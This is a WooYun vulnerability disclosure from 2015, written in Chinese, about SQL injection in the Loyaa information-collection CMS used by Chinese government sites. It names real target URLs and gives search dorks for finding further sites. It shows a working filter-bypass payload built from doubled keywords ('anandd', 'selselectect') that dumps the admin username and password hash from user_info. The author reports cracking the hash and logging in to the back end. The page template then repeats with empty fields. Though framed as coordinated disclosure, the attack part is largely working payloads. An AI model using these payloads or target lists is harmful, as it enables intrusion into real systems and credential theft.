Loyaa 信息自动采编系统7处SQL注入绕过漏洞打包

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095995

漏洞标题：Loyaa 信息自动采编系统7处SQL注入绕过漏洞打包

漏洞作者： goubuli

提交时间：2015-02-11 18:28

修复时间：2015-05-14 14:36

公开时间：2015-05-14 14:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-11：细节已通知厂商并且等待厂商处理中
2015-02-13：厂商已经确认，细节仅向厂商公开
2015-02-16：细节向第三方安全合作伙伴开放
2015-04-09：细节向核心白帽子及相关领域专家公开
2015-04-19：细节向普通白帽子公开
2015-04-29：细节向实习白帽子公开
2015-05-14：细节向公众公开

简要描述：

某通用政府采编系统7处SQL注入绕过漏洞打包，成功进后台

详细说明：

这个漏洞wooyun暂时还没有提交。。。见截图
漏洞一、注入点：
1、/more.php
如：http://www.jys.gov.cn/more.php?p=0&c=109016
参数c
2、videoMore.php
如：http://www.jys.gov.cn/videoMore.php?p=0&c=109003
参数c
3、/detail.php
所有参数
4、/detail_zt.php
所有参数
5、/video.php
所有参数
6、/index2.php
如：http://www.jys.gov.cn/video.php?c=109003&i=248251a
所有参数
7、hfrx.php
如：http://www.jys.gov.cn/hfrx.php?c=109006&i=245224a
所有参数
漏洞二、爆路径：
http://www.jiangyan.gov.cn/interface/jy_bbs_list.php?obj=ad_h2&c=5&n=3&t=46&tid=2

搜索特征：
1、gov.cn/detail.php?c=
2、gov.cn/detail_zt.php?c=

为了不损害目标站点及建站系统，标题写的比较隐晦，其实具体系统是《Loyaa 信息自动采编系统》 v3.0
如采购截图：

按照通用流程标准，需要有演示+案例。
以两处较明显的特征搜索，其他的特征搜索不准确。
搜索特征：
第一处：

第二处：

案例：
http://www.jys.gov.cn/detail.php?c=101002&i=248464
http://huagang.gov.cn/detail.php?c=101203&i=205139
http://jsjygsj.gov.cn/detail.php?c=101004&i=246715
http://www.jsjyxzsp.gov.cn/detail.php?c=201811&i=49626
http://jykfq.gov.cn/detail.php?c=301631&i=210108
http://jysf.gov.cn/detail.php?c=222903&i=242453
http://www.jyjtj.gov.cn/detail.php?c=201701&i=231307
http://www.jsjyhrss.gov.cn/detail.php?c=101004&i=246591
http://www.jysagr.gov.cn/detail.php?c=101102&i=34411
http://www.jyhb.jiangyan.gov.cn/detail.php?c=211023&i=244371
http://jyws.gov.cn/detail.php?c=212001&i=220976
http://www.jydx.org.cn/detail.php?c=101101&i=49881
http://jslxz.cn/detail.php?c=201958&i=205507
http://www.jsjy.agri.gov.cn/detail.php?c=201904&i=222360

漏洞证明：

演示：
拿其中一个政府主站演示，演示一处，其他注入类似。。。注入点都一样。。。
具体链接：http://www.jys.gov.cn/detail_zt.php?i=195998&c=105130
直接提交'，爆出SQL，如图

但是在用工具跑的过程中发现有防御。。。跑不出来数据。。。如图

下面演示纯手工注入搞定管理员账户。。。
1、提交and 1=1
直接过滤了and和=，如图

2、提交带有()的数据
()也被过滤了。。。
3、order by
没有过滤order by

搞到字段长度为：9
接下来union 查询
悲剧的是也被过滤了。。。这就不不截图了。。。
4、绕过
试了好多方法，如：URLEncode编码、tab、CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)、+拆解等等
原来系统所做的过滤是replace一些关键字
因此提交：

http://www.jys.gov.cn/detail_zt.php?i=195998&c=105130 anandd 1 is false ununionion selselectect 1,2,3,4,5,6,7,8,9

因为过滤了()，而且也知道是MySQL数据库，因此接下来就是要搞管理员信息，然后进后台。。
由于在注入报错的时候能够看到具体的SQL，里面有一张表是：user_info
具体信息是：

Select 
			news_title.id, 
			news_title.title, 
			news_title.categoryId, 
			news_title.editorId, 
			news_title.fromWeb, 
			news_title.dateCreated, 
			news_detail.detail, 
			news_category.title as category_title, 
			user_info.personalOffice 
		from 
			news_title, 
			news_detail, 
			news_category, 
			user_info 
		where 
			news_title.id=news_detail.titleId and 
			news_title.categoryId=news_category.customId and 
			news_title.editorId=user_info.id and 
			news_title.id=195998 and 
			news_title.archives=0  and 
			news_title.status>0 
			 and news_title.categoryId=105130' 
			
		limit 1

后台登录地址：http://houtai.jiangyan.gov.cn/
在后台登录试了弱口令不能进去，查看页面源码找出用户名、密码字段：

分别是：username、userpassword
下面查出用户名和密码

http://www.jys.gov.cn/detail_zt.php?i=195998&c=105130 anandd 1 is false ununionion selselectect 1,username,3,4,id,userpassword,7,8,9 frfromom user_info

得到用户名：admin
密码：*7D4170B3DFD2B12261BC4D66C055EF5962E1C373
密文类型:mysql5。

最终几毛钱解密成功。。。这里密码不公开了。。。

登录成功

用户信息

申明：未做任何破坏操作。

修复方案：

1、过滤
2、增加WAF
3、添加友好错误页面

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：17

确认时间：2015-02-13 14:34

厂商回复：

CNVD确认所述情况，由CNVD通过网站公开联系方式向软件生产厂商通报。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095995

漏洞标题：Loyaa 信息自动采编系统7处SQL注入绕过漏洞打包

相关厂商：宜达科技

漏洞作者： goubuli

提交时间：2015-02-11 18:28

修复时间：2015-05-14 14:36

公开时间：2015-05-14 14:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095995

漏洞标题：Loyaa 信息自动采编系统7处SQL注入绕过漏洞打包

相关厂商：宜达科技

漏洞作者： goubuli

提交时间：2015-02-11 18:28

修复时间：2015-05-14 14:36

公开时间：2015-05-14 14:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-095995"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：